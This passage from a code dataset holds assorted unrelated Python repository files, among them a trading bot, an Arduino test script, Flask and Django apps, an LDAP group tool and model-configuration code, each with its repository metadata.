Create\na virtualenv and then install the required libraries with\n\n$ pip install -r requirements.txt\n\nIf you need to run this locally, please contact Sam or Carlos for\nthe private key to access the spreadsheet from the script.\n\n\"\"\"\n\nimport json\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\n\n##############################################################################\n# Data Loading\n\ndef load_credentials():\n scope = ['https://spreadsheets.google.com/feeds']\n credentials = ServiceAccountCredentials.from_json_keyfile_name(\n 'files/service-account-key.json',\n scope)\n return credentials\n\ndef context(credentials):\n return gspread.authorize(credentials)\n\ndef load_sheet_by_name(gc, name):\n result = [v for v in gc.worksheets() if v.title == name]\n if len(result) == 0: raise Exception(\"Could not find '%s' sheet\" % name)\n if len(result) > 1: raise Exception(\"Too many '%s' sheets\" % name)\n return result[0]\n\ndef get_spreadsheet(name):\n return context(load_credentials()).open(name)\n\n##############################################################################\n# Poor man's RDBMS\n\ndef inner_join(lst1, lst2, column):\n result = []\n index_lst2 = dict((v[column], v) for v in lst2)\n for el in lst1:\n if el[column] in index_lst2:\n row = el.copy()\n row.update(index_lst2[el[column]])\n result.append(row)\n return result\n\ndef left_outer_join(lst1, lst2, column):\n result = []\n index_lst2 = dict((v[column], v) for v in lst2)\n for el in lst1:\n row = el.copy()\n if el[column] in index_lst2:\n row.update(index_lst2[el[column]])\n result.append(row)\n return result\n\n\n\ndef group_by(lst, selector):\n result = {}\n for item in lst:\n key = selector(item)\n if key not in result:\n result[key] = []\n result[key].append(item)\n return [{'Key': key, 'Value': value} for (key, value) in result.items()]\n\ndef group_by_pairs(lst, selector):\n result = []\n for d in group_by(lst, selector):\n result.append((d['Key'], d['Value']))\n return result\n\ndef recolumn(lst, old_column, new_column):\n result = []\n for item in lst:\n item = item.copy()\n v = item[old_column]\n del item[old_column]\n item[new_column] = v\n result.append(item)\n return result\n\ndef column(name):\n def f(item): return item[name]\n return f\n","repo_name":"ieee-vgtc/ieeevis.org","sub_path":"scripts/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"18"} +{"seq_id":"30551511257","text":"#!/usr/bin/env python\n\nfrom utc_bot import UTCBot, start_bot\nimport proto.utc_bot as pb\nimport betterproto\nimport math\nimport re\n\nimport asyncio\nimport random\n\nfrom typing import Optional\n\n\"\"\"Constant listed from case packet\"\"\"\nDAYS_IN_YEAR = 252\nLAST_RATE_ROR_USD = 0.25\nLAST_RATE_HAP_USD = 0.5\nLAST_RATE_HAP_ROR = 2\n\n###### CONSTANTS ####\nTICK_SIZES = {\n '6RH': 0.00001, \n '6RM': 0.00001, \n '6RU': 0.00001, \n '6RZ': 0.00001, \n '6HH': 0.00002,\n '6HM': 0.00002, \n '6HU': 0.00002, \n '6HZ': 0.00002, \n 'RHH': 0.0001, \n 'RHM': 0.0001, \n 'RHU': 0.0001,\n 'RHZ': 0.0001, \n \"RORUSD\": 0.00001\n }\n#H, M, U, Z are Month Codes\n#6R: ROR/USD\n#6H: HAP/USD\n#RH: HAP/ROR\ncontracts = [\"6R\", \"6H\", \"RH\"]\ntimes = [ \"M\", \"U\", \"Z\"]\n\nFUTURES = [i+j for i in contracts for j in times]\n## ALGO #############\n\ndef E(book: list) -> float:\n total = sum([lvl.qty for lvl in book])\n ev = 0\n for ask in book:\n ev += float(ask.px) * 
((ask.qty)/total)\n return ev\n\ndef VAR(book:list, EV: float) -> float:\n V = 0 \n for item in book:\n V += item.qty * (float(item.px) - EV)**2\n return V\n\n\n\n'''Rounds price to nearest tick_number above'''\ndef round_nearest(x, tick=0.0001):\n return round(round(x / tick) * tick, -int(math.floor(math.log10(tick))))\n\n'''Finds daily interest rates from annual rate'''\ndef daily_rate(daily_rate):\n return math.pow(daily_rate, 1/252)\n\nclass ArbitrageBot(UTCBot):\n async def check_arbitrage(self, update: pb.MarketSnapshotMessage):\n for t, asset in update.books.items():\n EV_ask = E(asset.asks)\n EV_bid = E(asset.bids)\n if (len(asset.bids) > 0):\n min_bid = float(min(asset.bids, key = lambda i: i.px).px)\n else:\n min_bid = 0\n self.data[t] = {\n 'exp_bid': EV_bid,\n 'stdDev_bid': VAR(asset.bids, EV_bid), \n 'exp_ask': EV_ask,\n 'stdDev_ask': VAR(asset.asks, EV_ask), \n 'min_bid': min_bid\n }\n #PATH A\n for time in times:\n asset = 'RH' + time\n try:\n path_a = (self.data[asset]['min_bid']) * \\\n (self.data[asset]['exp_bid']) * \\\n (self.data['RORUSD']['exp_bid'])\n except ZeroDivisionError:\n path_a = 0\n \n \n # print(f\"Path A : {path_a}\")\n if path_a > 1 and not self.arbit_opening:\n hap = await self.place_order(asset, pb.OrderSpecType.LIMIT, pb.OrderSpecSide.ASK, 100, round(self.data[asset]['min_bid'], 4))\n endhap = await self.place_order(asset, pb.OrderSpecType.LIMIT, pb.OrderSpecSide.BID, 100, round(self.data[asset]['exp_ask'], 4))\n rorusd = await self.place_order('RORUSD', pb.OrderSpecType.LIMIT, pb.OrderSpecSide.BID, 100, round(self.data['RORUSD']['exp_bid'] - self.data['RORUSD']['stdDev_bid'], 5))\n self.arbit_opening = True\n\n \n def update_pnl(self, update: pb.PnLMessage):\n pass\n \n \n def update_portfolio(self, update: pb.FillMessage):\n pass\n\n\n async def handle_round_started(self):\n \"\"\"\n Important variables below, some can be more dynamic to improve your case.\n Others are important to tracking pnl - cash, pos, \n Bidorderid, askorderid track order information so we can modify existing\n orders using the basic MM information (Right now only place 2 bids/2 asks max)\n \"\"\"\n self.cash = 0.0\n self.pos = {asset:0 for asset in FUTURES + [\"RORUSD\"]}\n # self.fair = {asset:5 for asset in FUTURES + [\"RORUSD\"]}\n self.mid = {asset: None for asset in FUTURES + [\"RORUSD\"]}\n self.max_widths = {asset:0.005 for asset in FUTURES}\n self.arbit_opening = False \n # self.bidorderid = {asset:[\"\",\"\"] for asset in FUTURES}\n # self.askorderid = {asset:[\"\",\"\"] for asset in FUTURES}\n\n\n stored_data = {'exp_bid':0, 'stdDev_bid': 0, 'exp_ask':0, 'stdDev_ask':0}\n self.data = dict([(i, stored_data) for i in FUTURES + ['RORUSD']])\n\n\n\n \"\"\"\n Constant params with respect to assets. 
Modify this if you would like to change\n parameters based on asset\n \"\"\"\n self.params = {\n \"edge\": 0.005,\n \"limit\": 100,\n \"size\": 10,\n \"spot_limit\": 10\n }\n \n\n async def handle_exchange_update(self, update: pb.FeedMessage):\n kind, _ = betterproto.which_one_of(update, \"msg\")\n # print('*'*50)\n if kind == \"market_snapshot_msg\":\n await self.check_arbitrage(update.market_snapshot_msg)\n if kind == \"pnl_msg\":\n my_m2m = self.cash\n for asset in (FUTURES + [\"RORUSD\"]):\n my_m2m += self.mid[asset] * self.pos[asset] if self.mid[asset] is not None else 0\n print(\"M2M\", update.pnl_msg.m2m_pnl, my_m2m)\n #Update position upon fill messages of your trades\n if kind == \"fill_msg\": \n self.arbit_opening = False\n if update.fill_msg.order_side == pb.FillMessageSide.BUY:\n print(f\"BUY: {update.fill_msg.asset}\")\n self.cash -= update.fill_msg.filled_qty * float(update.fill_msg.price)\n self.pos[update.fill_msg.asset] += update.fill_msg.filled_qty\n else:\n \n print(f\"SELL: {update.fill_msg.asset}\")\n self.cash += update.fill_msg.filled_qty * float(update.fill_msg.price)\n self.pos[update.fill_msg.asset] -= update.fill_msg.filled_qty\n\n\n if kind == \"request_failed_msg\":\n pass\n if kind == \"liqidation_msg\":\n pass\n if kind == \"generic_msg\":\n pass\n \n \n \nif __name__ == \"__main__\":\n start_bot(ArbitrageBot)","repo_name":"Clarencechang3/UChiProj","sub_path":"clients/arbitrage.py","file_name":"arbitrage.py","file_ext":"py","file_size_in_byte":5897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26708130813","text":"import nanpy\nimport time\n\nprint(\"CONNECT\")\n# Initialise connection\n# connection = nanpy.SerialManager(device=\"/dev/ttyUSB0\")\nconnection = nanpy.SerialManager(device=\"/dev/ttyUSB0\")\narduino = nanpy.ArduinoApi(connection=connection)\n\n# Define pin's\nD0 = 0 # D0/RX - PD0\nD1 = 1 # D1/TX - PD1\nD2 = 2 # D2 - PD2\nD3 = 3 # D3 - PD3\nD4 = 4 # D4 - PD4\nD5 = 5 # D5 - PD5\nD6 = 6 # D6 - PD6\nD7 = 7 # D7 - PD7\n\nD8 = 8 # D8 - PB0\nD9 = 9 # D9 - PB1\nD10 = 10 # D10 - PB2\nD11 = 11 # D11 - PB3\nD12 = 12 # D12 - PB4\nD13 = 13 # D13 - PB5\n\nA0 = 14 # D14 - A0 - PC0 - ADC[0]\nA1 = 15 # D15 - A1 - PC1 - ADC[1]\nA2 = 16 # D16 - A2 - PC2 - ADC[2]\nA3 = 17 # D17 - A3 - PC3 - ADC[3]\nA4 = 18 # D18 - A4 - PC4 - ADC[4] - SDA\nA5 = 19 # D19 - A5 - PC5 - ADC[5] - SCL\n\n# Control outputs\ntime.sleep(5)\nprint(\"DEFINE\")\narduino.pinMode(D2, arduino.OUTPUT)\narduino.pinMode(D3, arduino.OUTPUT)\narduino.pinMode(D4, arduino.OUTPUT)\narduino.pinMode(D5, arduino.OUTPUT)\narduino.pinMode(D6, arduino.OUTPUT)\narduino.pinMode(D7, arduino.OUTPUT)\ntime.sleep(5)\narduino.digitalWrite(D2, arduino.LOW)\nprint(\"OUTPUT HIGH\")\ntime.sleep(5)\narduino.digitalWrite(D3, arduino.LOW)\nprint(\"OUTPUT HIGH\")\ntime.sleep(5)\narduino.digitalWrite(D4, arduino.LOW)\nprint(\"OUTPUT HIGH\")\ntime.sleep(5)\narduino.digitalWrite(D5, arduino.LOW)\nprint(\"OUTPUT HIGH\")\ntime.sleep(5)\narduino.digitalWrite(D6, arduino.LOW)\nprint(\"OUTPUT HIGH\")\ntime.sleep(5)\narduino.digitalWrite(D7, arduino.LOW)\nprint(\"OUTPUT HIGH\")\ntime.sleep(5)\narduino.digitalWrite(D2, arduino.HIGH)\nprint(\"OUTPUT LOW\")\ntime.sleep(5)\narduino.digitalWrite(D3, arduino.HIGH)\nprint(\"OUTPUT LOW\")\ntime.sleep(5)\narduino.digitalWrite(D4, arduino.HIGH)\nprint(\"OUTPUT LOW\")\ntime.sleep(5)\narduino.digitalWrite(D5, arduino.HIGH)\nprint(\"OUTPUT LOW\")\ntime.sleep(5)\narduino.digitalWrite(D6, arduino.HIGH)\nprint(\"OUTPUT 
LOW\")\ntime.sleep(5)\narduino.digitalWrite(D7, arduino.HIGH)\nprint(\"OUTPUT LOW\")\ntime.sleep(5)\nprint(\"STOP\")\n","repo_name":"TimSw/test","sub_path":"nanpy control/nanpy test outputs.py","file_name":"nanpy test outputs.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11965254941","text":"import csv\nimport firebase_admin\nimport json\nfrom typing import Set\n\nfrom argparse import ArgumentParser\nfrom firebase_admin import credentials, firestore\n\n\nVALID_CUISINES: Set[str] = set()\nwith open('valid_cuisines.txt', 'r') as fin:\n for line in fin:\n VALID_CUISINES.add(line.strip())\n\n\ndef process_file(path: str):\n db = firestore.client()\n\n with open(path, 'r') as fin:\n reader = csv.reader(fin, delimiter=',')\n\n for idx, tokens in enumerate(reader):\n if idx > 0:\n place_id = tokens[0]\n cuisines = [t.strip() for t in tokens[1:] if len(t.strip()) > 0]\n\n for cuisine in cuisines:\n assert cuisine in VALID_CUISINES, 'Found cuisine {} on line {}'.format(cuisine, idx)\n\n place_data = {\n 'cuisines': cuisines\n }\n db.collection('places').document(place_id).set(place_data, merge=True)\n\n if (idx % 100) == 0:\n print('Completed {} places.'.format(idx))\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('--cert-path', type=str, required=True)\n parser.add_argument('--cuisines-path', type=str, required=True)\n args = parser.parse_args()\n\n # Create the database client\n with open(args.cert_path, 'r') as fin:\n token_dict = json.load(fin)\n\n creds = credentials.Certificate(token_dict)\n firebase_admin.initialize_app(creds)\n\n # Process the cuisines\n process_file(path=args.cuisines_path)\n","repo_name":"upthe/taste-server","sub_path":"scripts/legacy/upload_cuisines.py","file_name":"upload_cuisines.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"35824500368","text":"from flask import Flask, render_template, request, flash\nfrom dataclasses import dataclass\nimport sqlite3\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = b'oxabadidea'\n\n\n@app.get(\"/\")\ndef index_page():\n con = sqlite3.connect(\"points.db\")\n cur = con.cursor()\n return render_template(\"index.html\", coords=fetch_markers(cur))\n\n\n@app.post(\"/\")\ndef receive_notification():\n data = request.form\n con = sqlite3.connect(\"points.db\")\n cur = con.cursor()\n\n try:\n longitude = float(data[\"longitude\"])\n latitude = float(data[\"latitude\"])\n title = data[\"title\"]\n description = data[\"description\"]\n except:\n print(\"Invalid data received\")\n flash(\"Invalid data types\")\n markers = fetch_markers(cur)\n\n return render_template(\"index.html\", coords=markers), 400\n\n cur.execute(\n \"INSERT INTO markers (longitude, latitude, title, description) VALUES (?, ?, ?, ?)\",\n (longitude, latitude, title, description),\n )\n con.commit()\n\n markers = fetch_markers(cur)\n return render_template(\"index.html\", coords=markers)\n\n\ndef fetch_markers(cur):\n markers = cur.execute(\"SELECT * FROM markers\").fetchall()\n return [DataPoint(m[1], m[2], m[3], m[4]) for m in markers]\n\n\n@dataclass\nclass DataPoint:\n longitude: float\n latitude: float\n title: str\n description: 
str\n\n","repo_name":"BeaconBrigade/wildfire-map","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"869206602","text":"import grpc\n\nfrom goodDataML.connection.gooddata import register_do, register_mpc\nfrom goodDataML.learning.testnet.utils import get_config_file\n\nif __name__ == '__main__':\n config = get_config_file('./local_config.json')\n\n good_data_service_channel = grpc.insecure_channel(config['good_data_service_address'],\n options=[\n ('grpc.max_send_message_length', 5 * 1024 * 1024),\n ('grpc.max_receive_message_length', 5 * 1024 * 1024),\n ])\n\n for do_name in config[\"dos\"]:\n do_config = config[do_name]\n register_do(public_key=do_config['public_key'],\n channel=good_data_service_channel,\n node_info={'address': do_config['ip_address'], 'port': do_config['port']})\n\n for mpc_name in config[\"mpcs\"]:\n mpc_config = config[mpc_name]\n register_mpc(channel=good_data_service_channel,\n mpc_info={'public_key': mpc_config['public_key'],\n 'node_info': {'address': mpc_config['ip_address'], 'port': mpc_config['port']}})\n","repo_name":"good-data-foundation/federated-learning-sdk","sub_path":"run/register_DOs.py","file_name":"register_DOs.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"20255436652","text":"import pprint #pprint makes the print look cleaner\n\nmessage = '''adjsajdbnasa\n\n bndsDASDF\n\n\nS''' #if I use three quotes to open and end a string, I can format it in any way!\ncount = {}\n\nfor character in message.upper():\n count.setdefault(character,0) #adds letter seen for the first time as a key and defaults its value to 0\n count[character] = count[character] + 1\n\npprint.pprint(count)\n\n#to have it printed as a string instead of printed to the shell, I can use pprint.format e.g:\ntext = pprint.pformat(count)\n\nprint(text)\n","repo_name":"wijdanb/Python-scripts","sub_path":"charactercount.py","file_name":"charactercount.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4416025496","text":"#!/usr/bin/python3\n# @author Ashley Perrin\n# 4/27/2020\n# CS 224 Python Project separate gui\n\nimport tkinter as tk\nimport term as amsearch\nfrom PIL import ImageTk, Image\n\nTK_SILENCE_DEPRECATION = 1 # Gets rid of warning message about TK version\n # GUI Code Elements\nwin = tk.Tk() # Creating tk window object\nwin.geometry(\"1000x800\") # Setting width & height of window\nwin.title(\"BotShopp\") # titling window\nwin.configure(bg = \"grey\") # sets window color grey\ncur_display = 0\n\ndef send_input():\n global cur_display\n cur_display = cur_display + 1\n if(cur_display == 1):\n cur_display = 0\n output.delete(\"1.0\", \"end-1c\")\n\n input = search.get(\"1.0\",\"end-1c\")\n output_item = amsearch.main(1, input)\n search.delete(\"1.0\", \"end-1c\")\n output.insert(\"1.0\", output_item)\n\nwelcome = tk.Label(win, # Creating welcome label with specifications\n text = \"Welcome to your Amazon personal shopper bot!\\n Enter any item you'd like to search for:\",\n font = \"Ayuthaya 24\",\n relief = \"groove\",\n bd = 5,\n width = 80,\n foreground = \"white\",\n background = \"navy blue\")\nwelcome.pack()\n\nframe = tk.Frame(win,\n bg = \"grey\",\n height = 500,\n width = 100,\n relief = \"groove\",)\n\nframe.pack(padx=5, 
pady=10)\n\nsearch_button = tk.Button(frame,\n text = \"Search\",\n bd = 5,\n font = \"Ayuthaya 17\",\n relief = \"raised\",\n command = lambda: send_input())\n\nsearch_button.pack(padx=5, pady=10, side=tk.LEFT)\n\nsearch = tk.Text(frame,\n bg = \"khaki\",\n bd = 5,\n foreground = \"black\",\n font = \"Ayuthaya 17\",\n width = 55,\n height = 1,\n relief = \"groove\",\n )\n\nsearch.pack(padx=5, pady=10, side=tk.LEFT)\n\noutput_frame = tk.Frame(win,\n bg = \"gray\",\n height = 500,\n width = 200,\n relief = \"groove\",)\n\noutput_frame.pack()\n\noutput= tk.Text(output_frame,\n bg = \"white\",\n bd = 5,\n foreground = \"black\",\n font = \"Ayuthaya 17\",\n #state='disabled',\n width = 100,\n height = 10,\n relief = \"groove\",\n )\noutput.pack(padx=5, pady=10, side=tk.LEFT)\n\nload = Image.open(\"avail.png\")\nloadsized = load.resize((190,125))\nrender = ImageTk.PhotoImage(loadsized)\npane = tk.Label(win, image = render)\npane.image = render\n\npane.pack()\n\nwin.mainloop() # Runs all aspects of gui`\n","repo_name":"ashperrin/224PythonProject","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74498542120","text":"\n'''\nUsing concept of inheritance\n\n'''\n\n\nfrom collections import deque\n\n\nclass Queue(deque):\n \n def __init__(self):\n super(deque,self).__init__()\n \n def enqueue(self,val):\n super().appendleft(val)\n \n def dequeue(self):\n return super().pop()\n \n def is_empty(self):\n length=len(self)\n if length==0:\n return True\n else:\n return False\n \nq=Queue()\nq.enqueue(23)\nq.enqueue(24)\nq.dequeue()\nprint(q.dequeue())\nprint(q.is_empty())\n","repo_name":"ma-heshpandey/Algorithm","sub_path":"Stack And Queue/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31640202775","text":"#!/usr/bin/env python3\nimport argparse\nimport os\nimport random\n\nfrom ldappy import load_config, connect\nfrom ldappy import create_group, check_gid_number\n\n\ndef add_group(conn, domain_dn, domain_dns, group_name):\n \n # find a gid_number\n gid_number = None\n while gid_number is None:\n gid_number = random.randint(5000, 50000)\n \n if check_gid_number(conn, domain_dn, gid_number) == False:\n gid_number = None\n \n # greate the group\n create_group(conn, domain_dn, domain_dn, group_name, gid_number)\n \n return gid_number\n \n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--config', help='path to config file', type=str, default=\"~/.config/s1767/admin/ldap.yaml\")\n parser.add_argument(\"group_name\", help=\"group name\", type=str)\n args = parser.parse_args()\n \n config = load_config(args.config)\n \n _, conn = connect(config['ldap_uri'], config['bind_dn'], config['bind_pw'],\n start_tls=config['start_tls'], \n ca_cert_file=config['ca_cert_file']\n )\n root_dn = config['root_dn']\n root_dns = config['root_dns']\n \n gid_number = add_group(conn, root_dn, root_dns, args.group_name)\n print(f\"Created group:\")\n print(f\" name: {args.group_name}\")\n print(f\" id number: {gid_number}\")\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"studio1767/admin-utils","sub_path":"ldap-users/add-group.py","file_name":"add-group.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} 
+{"seq_id":"4119756874","text":"#git ls-files | grep rs | xargs wc -l\nimport os\nfrom subprocess import run\nif __name__ == '__main__':\n for directory in os.listdir(os.getcwd()):\n if directory != 'compile.py':\n print(\"going to compile {}\".format(directory))\n os.chdir(directory)\n run([\"cargo\", \"clean\"])\n run([\"cargo\", \"update\"])\n run([\"cargo\", \"fmt\"])\n run([\"cargo\", \"rustc\", \"--release\", \"--\", \"-C\", \"target-cpu=native\", \"-C\", \"lto\"])\n\n run([\"git\", \"add\", \"src/*\"])\n run([\"git\", \"commit\", \"-m\", \"Cargo fmt\"])\n os.chdir('..')","repo_name":"DutchGhost/Advent-of-Code-2017","sub_path":"Rust/compile.py","file_name":"compile.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"37185236973","text":"from django.shortcuts import render\n\nfrom django.views import generic\n\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework import viewsets \nfrom rest_framework.decorators import api_view, permission_classes\n\nfrom .models import Office,AttendanceUser,Attendance,Crash,Analytics\nfrom django.core import serializers\nfrom .serializers import OfficeSerializer,UserSerializer,AttendanceSerializer,CrashSerializer,LoginSerializer\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.authtoken.views import ObtainAuthToken\nfrom rest_framework.authtoken.models import Token\nfrom django.contrib.auth import authenticate\n \nclass IndexView(generic.ListView):\n template_name = 'apis/index.html' \n \nclass OfficeViewSet(viewsets.ModelViewSet):\n queryset = Office.objects.all().order_by('name')\n serializer_class = OfficeSerializer\n \nclass AttendanceViewSet(viewsets.ModelViewSet):\n queryset = Attendance.objects.all()\n serializer_class = AttendanceSerializer\n \n \n@api_view(['GET'])\ndef getoffices(request): \n queryset = Office.objects.filter(isactive=True).order_by('name')\n serialized=OfficeSerializer(queryset,many=True) \n \n response={'response':{'msg':'success','status':200,'data':serialized.data}} \n return Response(response, status=status.HTTP_200_OK) \n \n \n \n \n@api_view(['GET'])\n@permission_classes((IsAuthenticated,))\ndef getattendance(request): \n queryset = Attendance.objects.filter(isactive=True)\n serialized=AttendanceSerializer(queryset,many=True) \n response={'response':{'msg':'success','status':200,'data':serialized.data}} \n return Response(response, status=status.HTTP_200_OK) \n\n\n\n@api_view(['POST'])\n@permission_classes((IsAuthenticated,))\ndef add_attendance(request):\n serialized = AttendanceSerializer(data=request.data)\n if serialized.is_valid():\n token=request.META['HTTP_AUTHORIZATION'][6:]\n token_instance=Token.objects.get(key=token)\n theuser=AttendanceUser.objects.filter(isactive=True).get(pk=token_instance.user_id)\n attendance = Attendance.objects.create(\n date=serialized.data['date'],\n time=serialized.data['time'],\n lat=serialized.data['lat'],\n lng=serialized.data['lng'],\n ispresent=serialized.data['ispresent'],\n user=theuser,\n ) \n Analytics.objects.create(action='add_attendance',search_params='',app_version=theuser.app_version,platform=theuser.platform,brand=theuser.brand,device=theuser.device,device_model=theuser.device_model,user=theuser)\n \n response={'response':{'msg':'success','status':200,'data':serialized.data}} \n return Response(response, status=status.HTTP_200_OK)\n else:\n return Response(serialized._errors, 
status=status.HTTP_400_BAD_REQUEST)\n \n \n@api_view(['POST'])\n@permission_classes((IsAuthenticated,))\ndef logout(request): \n \n token=request.META['HTTP_AUTHORIZATION'][6:]\n instance = Token.objects.get(key=token)\n theuser=AttendanceUser.objects.filter(isactive=True).get(pk=instance.user_id)\n instance.delete()\n \n Analytics.objects.create(action='logout',search_params='',app_version=theuser.app_version,platform=theuser.platform,brand=theuser.brand,device=theuser.device,device_model=theuser.device_model,user=theuser)\n \n response={'response':{'msg':'success','status':200}} \n return Response(response, status=status.HTTP_200_OK) \n \n@api_view(['POST'])\ndef add_crash(request): \n serialized = CrashSerializer(data=request.data)\n if serialized.is_valid():\n Crash.objects.create(\n exception=serialized.data['exception'],\n app_version=serialized.data['app_version'],\n platform=serialized.data['platform'],\n brand=serialized.data['brand'],\n device=serialized.data['device'],\n device_model=serialized.data['device_model']\n )\n response={'response':{'msg':'success','status':200}}\n return Response(response, status=status.HTTP_200_OK)\n else:\n return Response(serialized._errors, status=status.HTTP_400_BAD_REQUEST)\n \n \n@api_view(['POST'])\ndef register(request):\n serialized = UserSerializer(data=request.data)\n if serialized.is_valid():\n newuser=AttendanceUser.objects.create_user(\n serialized.data['username'],\n password=serialized.data['password'],\n fullname=serialized.data['fullname'],\n phone=serialized.data['phone'],\n office=serialized.data['office'],\n app_version=serialized.data['app_version'],\n platform=serialized.data['platform'],\n brand=serialized.data['brand'],\n device=serialized.data['device'],\n device_model=serialized.data['device_model'],\n )\n Analytics.objects.create(action='register',search_params='',app_version=serialized.data['app_version'],platform=serialized.data['platform'],brand=serialized.data['brand'],device=serialized.data['device'],device_model=serialized.data['device_model'],user=newuser)\n \n token=Token.objects.create(user=newuser)\n \n data={\n 'user_id':newuser.id,\n 'username':newuser.username,\n 'fullname':newuser.fullname,\n 'phone':newuser.phone,\n 'office_id':newuser.office.id,\n 'office_name':newuser.office.name,\n 'token':token.key\n }\n\n response={'response':{'msg':'success','status':200,'data':data}} \n return Response(response, status=status.HTTP_200_OK)\n else:\n return Response(serialized._errors, status=status.HTTP_400_BAD_REQUEST)\n \n \n \n \nclass login(ObtainAuthToken):\n def post(self, request, format=None):\n data = request.data\n\n username = data.get('username', None)\n password = data.get('password', None)\n app_version = data.get('app_version', None)\n platform= data.get('platform', None)\n brand= data.get('brand', None)\n device= data.get('device', None)\n device_model= data.get('device_model', None)\n \n user = authenticate(username=username, password=password)\n \n # guard against failed authentication before touching user attributes\n if user is None:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n \n user.app_version=app_version\n user.platform=platform\n user.brand=brand\n user.device=device\n user.device_model=device_model\n user.save()\n \n Analytics.objects.create(action='login',search_params='',app_version=app_version,platform=platform,brand=brand,device=device,device_model=device_model,user=user)\n \n if user is not None:\n if user.isactive==True:\n token, created = Token.objects.get_or_create(user=user)\n \n return Response(\n {\n 'response':\n {\n 'msg':'success',\n 
'status':200,\n 'data':{\n 'user_id': user.pk,\n 'username': user.username,\n 'fullname': user.fullname,\n 'phone': user.phone,\n 'office_id': user.office.id, \n 'office_name':user.office.name,\n 'token': token.key, \n }\n }\n })\n \n else:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n","repo_name":"aamirbilvani/Attendance-Tracker-Django","sub_path":"attendanceTracker/apis/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70151274605","text":"# -*- coding: utf-8 -*-\nimport unetsl\nimport unetsl.config\n\nimport pathlib\nimport json\n\n\n\nclass HeadConstants:\n name = \"name\"\n n_labels = \"n_labels\"\n bits = \"bits\"\n activation = \"activation\"\n depth = \"depth\"\n resampler = \"resampler\"\n offset = \"offset\"\n\ndef getDefaultCerberusConfig():\n unet = unetsl.config.getDefaultModelConfig()\n \n unet.pop(unetsl.N_LABELS, None)\n unet.pop(unetsl.ACTIVATION, None)\n \n dflt = {\"unet\" : unet,\n \"heads\": [],\n unetsl.DATA_SOURCES : []\n }\n default_heads = [\n (\"distance\", 1, 6, 2, \"relu\", 0, unetsl.data.LINEAR_LABELS, \"min pool\"),\n (\"membrane-scale\", 2, 2, 0, \"sigmoid\", 1, unetsl.data.MULTICLASS_LABELS, \"max pool\"),\n (\"membrane-crop\", 2, 2, 0, \"sigmoid\", 0, unetsl.data.MULTICLASS_LABELS, \"crop\") \n ]\n \n for nm, n_labels, bits, offset, activation, depth, labeller_name, resampler in default_heads:\n hd = getDefaultHeadConfig()\n hd[HeadConstants.name] = nm\n hd[HeadConstants.n_labels] = n_labels\n hd[HeadConstants.bits] = bits\n hd[HeadConstants.offset] = offset\n hd[HeadConstants.activation] = activation\n hd[HeadConstants.depth] = depth\n hd[unetsl.data.LABELLER] = labeller_name\n hd[HeadConstants.resampler] = resampler\n dflt[\"heads\"].append(hd)\n return dflt\n\ndef getDefaultCerberusPredictionConfig():\n return {\n }\n\ndef saveConfig(cfg, pth):\n with open(pth, 'w', encoding=\"utf8\") as f:\n json.dump(cfg, f, indent=\" \")\n \n\ndef guessDefaultLossFunction(name):\n \"\"\"\n For setting up a default model that \"works\" without changing any parameters \n during create/attach/train.\n \n 'distance' is a head with a distance transform output, this presumes\n linear labels, and the logMse. 
This seems a bit more robust than the mse\n and it prevents the distance transform from dominating the loss optimization.\n \n 'membrane' or 'skeleton' would be a sparse labelling where the dice\n coefficient has been shown to work well.\n \n \"\"\"\n if 'distance' in name:\n return \"unetsl.model.logMse\"\n elif 'membrane' in name or 'skeleton' in name:\n return \"unetsl.model.sorensenDiceCoefLoss\"\n \n return \"keras.losses.mean_squared_error\"\n\ndef getTrainingConfig(config):\n \"\"\"\n Checks the provided config for training config; if it isn't present, \n a default version will be loaded.\n \n \"\"\"\n if config is None:\n config = getDefaultCerberusConfig()\n \n if \"training\" not in config:\n training_config = dict()\n training_config.update( unetsl.config.getDefaultTrainingConfig() )\n \n training_config[unetsl.LOSS_FUNCTION] = {}\n training_config[\"loss weights\"] = {}\n config[\"training\"] = training_config\n else:\n training_config = config[\"training\"]\n \n loss_fns = training_config[unetsl.LOSS_FUNCTION]\n loss_wts = training_config[\"loss weights\"]\n \n for head in config[\"heads\"]:\n if head[\"name\"] not in loss_fns:\n loss_fns[ head[\"name\"] ] = 